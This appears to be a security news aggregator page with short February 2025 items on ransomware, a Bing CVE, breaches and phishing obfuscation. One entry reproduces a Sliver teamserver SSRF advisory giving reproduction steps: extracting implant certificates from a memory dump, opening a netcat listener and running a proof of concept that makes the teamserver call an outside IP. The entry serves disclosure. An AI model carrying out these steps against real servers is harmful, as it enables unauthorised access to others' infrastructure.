Description: Ransomware Attack Update for 19th of February 2025
February 20th, 2025 (5 months ago)
|
CVE-2025-21355 |
Description: CVE-2025-21355: Microsoft Bing Remote Code Execution Vulnerability
CVSS: HIGH (8.6) EPSS Score: 1.08%
February 19th, 2025 (5 months ago)
|
Description: These sorts of attacks reveal growing adversary interest in secure messaging apps used by high-value targets for communication, Google says.
February 19th, 2025 (5 months ago)
|
Description: The start-up incubator and PR firm with holdings in more than 70 cybersecurity firms has announced a data breach with as-yet-unknown effects.
February 19th, 2025 (5 months ago)
|
Description: Summary

The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so.

Reproduction steps

Run server:

```
wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
```

Generate binary:

```
generate --mtls 127.0.0.1:8443
```

Run it on windows, then Task manager -> find process -> Create memory dump file.

Install RogueSliver and get the certs:

```
git clone https://github.com/ACE-Responder/RogueSliver.git
pip3 install -r requirements.txt --break-system-packages
python3 ExtractCerts.py implant.dmp
```

Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc:

```
nc -nvlp 1111
```

Run the poc (pasted at bottom of this file):

```
python3 poc.py
python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
```

Details

We see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed:

```go
func handleSliverConnection(conn net.Conn) {
	mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr())
	implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())
	defer func() {
		mtlsLog.Debugf("mtls connection closing")
		conn.Close()
		implantConn.Cleanup()
	}()
	done := make(chan bool)
	go func() {
		defer func() {
			done <- true
		}()
		handlers := se...
```
February 19th, 2025 (5 months ago)
|
Description: CISA and the FBI said attackers deploying Ghost ransomware have breached victims from multiple industry sectors across over 70 countries, including critical infrastructure organizations. [...]
February 19th, 2025 (5 months ago)
|
Description: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC). [...]
February 19th, 2025 (5 months ago)
|
Description: LazaGrad Hack Targeted the Website of University of Religions and Denominations
February 19th, 2025 (5 months ago)
|